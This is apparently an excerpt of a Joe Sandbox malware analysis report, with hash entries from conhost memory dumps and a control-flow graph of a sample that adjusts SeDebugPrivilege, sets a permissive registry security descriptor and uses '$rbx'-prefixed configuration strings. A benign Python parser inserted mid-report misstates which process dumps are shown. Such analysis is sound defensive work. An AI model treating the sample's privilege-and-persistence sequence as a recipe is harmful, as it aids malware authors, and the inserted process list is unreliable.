                                                                                                                                                          • Instruction Fuzzy Hash: F8618032508BC485E771AF16E8447DAB7B5F786B94F448216EB9A17B95CF7CC290CB00
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: cbef3943a86d3397b2efc485fc5f7b319e956dfb870356ec879a509c05f7c158
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 37910572F0165187EB64EF25D408F7EBB91FB54B98F988138AE490B788DA39D813C700
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 49e7960e631a13ad5e2111746cd1fb7e93bde27fb68191e75f18ad9ac0635c3c
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: 8CD1B472E04B4086EB60EF65D48979E7BA0F749788F981115FF895BB96DF34C086C740
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: c37b13270aa7407912f7943b88fc27937ecb00801f913bcf71f046192425be9b
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 3F81A230E0036146FA64FB66A84DF6B6ED1BB86780F9C4125BF494FB96DA78C847C700
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: e2b8fbb18f3365c7fb40e6b19e0993ec8332f61e2f5c7f77f7c7ae9521c0e5fb
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 1251DF32A003818AEF74EF119148B6ABBA4F755B94F9C4116FF894BBC2CB38D456CB41
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 3523435f5bff0c0534b94175d9606482b1bcaa9e10ea33b5aa815bd4a454552d
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 07519F32B11E408AEF54EB15E448F6E7B91F744B98F9D8525FE4A4B788DB79C842C700
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: 073573d9f73a604b9228b53cbba3181b7176bc9675b90e120e148224b89814b4
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: 3361A032904BC481DB71EF15E444B9ABBA0F789B98F484215FF981BB95DB7CC195CB00
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000053.00000003.2326869655.000001C8A0380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C8A0380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_83_3_1c8a0380000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 19352068d3fcafc8b099bf857b523b228fd6a7eb083d2af4ac13b28ebcc27920
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: BF910172B4125087EB649F25D4C4FA9B392FB54F98F5481A69E4B07B88DF38D81BD700
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000053.00000003.2326869655.000001C8A0380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C8A0380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_83_3_1c8a0380000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 2c977784fcb8f0e3e9c9eb02f06410c54dbfa55397d3412ffae69ec59b033eea
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: F0D16732644B808AFB609F6594C0BED77A0F785798F180157EE8B57B9ADF38C58AD700
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000053.00000003.2326869655.000001C8A0380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C8A0380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_83_3_1c8a0380000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 7738cf1bb3018d848007226ae80e74287a9053f5b5e9eee177340f91ba4b890f
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 018124316806448AFB50ABA598D1FFD62D3AB867C0F4440979E0B47796DF38C84FE740
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000053.00000003.2326869655.000001C8A0380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C8A0380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_83_3_1c8a0380000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 0b30fe50fdfef2a01b5cd5ac631995bf67571dd6f93737474a190a8c95b73af6
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 9E519C722806848AFB748F2195C4B9877A0F354B99F184197DB8B87BD5CF38C45AEB01
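The entries above repeat the same functions across three conhost.exe memory dumps (processes 70, 73 and 83 in the snapshot file names, 0x46, 0x49 and 0x53 as the first field of the .sdmp names): for each function the Opcode ID is identical in every dump while the Instruction ID differs. The parser below is an added example and is not part of the Joe Sandbox report or its tooling. It reads entries in the layout shown above, cross-checks the dump and snapshot names against each other, and groups functions by Opcode ID to list those present in more than one process, which is the view a responder wants when the same PE-backed code shows up inside several system processes. The four embedded entries are copied from this section (with the two fuzzy-hash lines left out for brevity); the field names are the report's own. The reading of Opcode ID as a hash that ignores operands, and therefore stays stable across different load addresses, is an assumption made here and not something the report states.

```python
import re
from collections import defaultdict

# Four entries copied from the report section above (fuzzy-hash lines omitted).
# "Memory Dump Source" opens each entry; bullet lines carry "Key: Value" fields;
# bare labels such as APIs / Strings / Similarity carry no data.
SAMPLE = """
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000003.2325509229.000001858EA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001858EA10000, based on PE: true
• Snapshot File: hcaresult_70_3_1858ea10000_conhost.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
• Instruction ID: afcaed05c652a5a5b94bc523da64245073e27d53a2fb3ba79b0f48c828c94ee8
APIs
Memory Dump Source
• Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
• Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
• API ID: LibraryLoad
• String ID:
• Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
• Instruction ID: cbef3943a86d3397b2efc485fc5f7b319e956dfb870356ec879a509c05f7c158
APIs
Memory Dump Source
• Source File: 00000049.00000003.2326200021.000002942EBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002942EBE0000, based on PE: true
• Snapshot File: hcaresult_73_3_2942ebe0000_conhost.jbxd
• API ID: CallTranslator
• String ID: MOC$RCC
• Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
• Instruction ID: 073573d9f73a604b9228b53cbba3181b7176bc9675b90e120e148224b89814b4
APIs
Memory Dump Source
• Source File: 00000053.00000003.2326869655.000001C8A0380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C8A0380000, based on PE: true
• Snapshot File: hcaresult_83_3_1c8a0380000_conhost.jbxd
• API ID: LibraryLoad
• String ID:
• Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
• Instruction ID: 19352068d3fcafc8b099bf857b523b228fd6a7eb083d2af4ac13b28ebcc27920
"""

SNAPSHOT_RE = re.compile(r"hcaresult_(\d+)_(\d+)_([0-9a-f]+)_([^.]+)\.jbxd$")


def parse_records(text):
    """Split report text into one dict per function entry (Key -> Value)."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()  # drop the report's bullet glyph
        if line == "Memory Dump Source":        # opens every entry
            current = {}
            records.append(current)
        elif current is not None and ":" in line:
            key, _, value = line.partition(":")  # first colon only: Source File holds more
            current[key.strip()] = value.strip()
        # bare labels (APIs, Strings, Similarity) carry no data and are skipped
    return [enrich(r) for r in records if "Opcode ID" in r]


def enrich(rec):
    """Derive process identity from Source File / Snapshot File and cross-check them."""
    dump, offset, pe = [p.strip() for p in rec["Source File"].split(",")]
    rec["dump_file"] = dump
    rec["offset"] = int(offset.partition(":")[2], 16)
    rec["based_on_pe"] = pe.endswith("true")
    m = SNAPSHOT_RE.search(rec["Snapshot File"])
    if not m:
        raise ValueError("unexpected snapshot name: " + rec["Snapshot File"])
    proc_no, dump_no, base, image = m.groups()
    # The first two dotted fields of the .sdmp name are the same process/dump
    # numbers in hex (0x46 == 70, 0x49 == 73, 0x53 == 83); the base must match Offset.
    first, second = dump.split(".")[:2]
    if int(first, 16) != int(proc_no) or int(second, 16) != int(dump_no):
        raise ValueError("snapshot and dump names disagree: " + dump)
    if int(base, 16) != rec["offset"]:
        raise ValueError("snapshot base does not match dump offset: " + dump)
    rec["process"] = f"{image}:{proc_no}"
    return rec


def functions_shared_across_dumps(records):
    """Group by Opcode ID and report functions present in more than one process."""
    by_opcode = defaultdict(list)
    for r in records:
        by_opcode[r["Opcode ID"]].append(r)
    shared = {}
    for opcode_id, recs in by_opcode.items():
        procs = sorted({r["process"] for r in recs})
        if len(procs) < 2:
            continue
        shared[opcode_id] = {
            "api_id": recs[0]["API ID"],
            "processes": procs,
            # Instruction IDs differ per dump although the Opcode ID is identical
            "instruction_ids": len({r["Instruction ID"] for r in recs}),
        }
    return shared


if __name__ == "__main__":
    for oid, info in functions_shared_across_dumps(parse_records(SAMPLE)).items():
        print(oid[:16], info["api_id"], info["processes"], info["instruction_ids"])
```

Run against a copy of the whole section rather than the four embedded entries to get the complete list of functions common to the three conhost dumps; the name cross-checks in `enrich` raise on any entry whose .sdmp and .jbxd names disagree, which is the first thing to look at if a copied report is corrupted.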
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000053.00000003.2326869655.000001C8A0380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C8A0380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_83_3_1c8a0380000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 889c46e17dbd64792637c4671fe6e62dd1562e99e52175427f1cca2d013c775e
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 6651AF32351A008AFB54CB55E4C8FAD3392F744B98F158966EA5B47788DFB8D84BD700
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000053.00000003.2326869655.000001C8A0380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C8A0380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_83_3_1c8a0380000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: 1bb4b78811c5c4abe62e571f68841a64e8376ae27c028714d208fe64885c0b68
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: DB61A432504BC486E7719F25E4C0BDAB7A0F785B98F084257EB9A07B95CF78D199CB00
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000057.00000003.2328439710.000001E5EF030000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E5EF030000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_87_3_1e5ef030000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: e9ddc09656c535c507aabf7bebc263a342af66bf69c25ca857974b45eb6f4c50
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 3191F672B02A908BDB64CF25D480BBDF392F754F9CF5481249E4A07788DE38DA92C720
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000057.00000003.2328439710.000001E5EF030000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E5EF030000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_87_3_1e5ef030000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 1e01f096067bcabed8c542143390de27975402baa7fda43b1b3fe88bc6448095
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: 70D15932605F808AEB60DB65D4803EDB7A2F79579CF100216EE8A57B9AEF34D6C1C750
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000057.00000003.2328439710.000001E5EF030000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E5EF030000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_87_3_1e5ef030000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 3f63e6bbcb06ac1ace6e4e463d0979961c0b65d184a1f480475221ca84d76ab9
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 2B81913160AEC586FB66DB25D8413FDE393AB86788F844015DD0B87796DE38CBC68720
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000057.00000003.2328439710.000001E5EF030000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E5EF030000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_87_3_1e5ef030000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 3438cb41270473d6357098ffc23fb8e70859165a43d0e0ae1de4f186cd2278b2
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: E3517D3A206AC18AEB74CF21D5443ACB7A2F354B9CF144216DE9A47B95CF38D6D0CB21
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000057.00000003.2328439710.000001E5EF030000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E5EF030000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_87_3_1e5ef030000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 342457e0b5f12076314656442a898e3fe87875a873b872c18f7f278e0240bf96
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 72516933212E808AEB54CB16E444BBDB7E6E744B9CF158565EE4B47788DB78CB81C720
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000057.00000003.2328439710.000001E5EF030000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E5EF030000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_87_3_1e5ef030000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: 141dd43aeb2e4055bd42f876e11c26b587a96ccb43ca305d94d281b557471410
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: DD617732509BC482EB60CB15E4413EEB7A2F785B88F044215EF9A07B99EF78D2D0CB10

Execution Graph

Execution Coverage:41.7%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:46.5%
Total number of Nodes:245
Total number of Limit Nodes:28
execution_graph: serialized data of the interactive execution-graph figure (numbered nodes, each carrying a function address and the Windows API names called from it, plus directed edges between nodes); the raw node and edge listing is not reproduced here. The dump starts new node groups at function addresses 140003204, 140003668, 140003728, 140002d38 and 140002cb0.

Callgraph

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 140002d4c-140002d5c 1 140002d5e-140002d75 OpenMutexW 0->1 2 140002d84-140002dc1 CloseHandle call 140002a0c * 2 GetCurrentProcessId OpenProcess 1->2 3 140002d77-140002d82 Sleep 1->3 8 140002dc3-140002dd7 OpenProcessToken 2->8 9 140002e39-140002e64 RegOpenKeyExW 2->9 3->1 12 140002dd9-140002dee LookupPrivilegeValueW 8->12 13 140002e30-140002e33 CloseHandle 8->13 10 1400031b3-1400031c1 9->10 11 140002e6a-140002e94 RegQueryValueExW 9->11 11->10 14 140002e9a-140002ec4 RegQueryValueExW 11->14 12->13 15 140002df0-140002e28 AdjustTokenPrivileges 12->15 13->9 14->10 16 140002eca-140002f36 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 14->16 15->13 17 140002e2a GetLastError 15->17 16->10 18 140002f3c-140002f66 RegQueryValueExW 16->18 17->13 18->10 19 140002f6c-140002fba RegCloseKey GetCurrentProcessId call 14000200c RegCreateKeyExW 18->19 22 14000307d-140003111 CreateThread GetProcessHeap HeapAlloc CreateThread * 2 call 14000151c 19->22 23 140002fc0-140002fe6 ConvertStringSecurityDescriptorToSecurityDescriptorW 19->23 30 140003113-140003143 ShellExecuteW 22->30 31 140003145-1400031ad call 14000148c call 1400011d4 call 14000148c * 3 call 1400011d4 * 3 GetProcessHeap HeapFree SleepEx 22->31 24 140003002-14000303a RegCreateKeyExW 23->24 25 140002fe8-140002ffc RegSetKeySecurity LocalFree 23->25 27 140003073-140003077 RegCloseKey 24->27 28 14000303c-14000306d GetCurrentProcessId RegSetValueExW RegCloseKey 24->28 25->24 27->22 28->27 30->30 30->31 31->10
APIs
Strings
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
• String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
• API String ID: 2725631067-1382791509
• Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
• Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
• Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
• Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744

Control-flow Graph

• Executed
• Not Executed
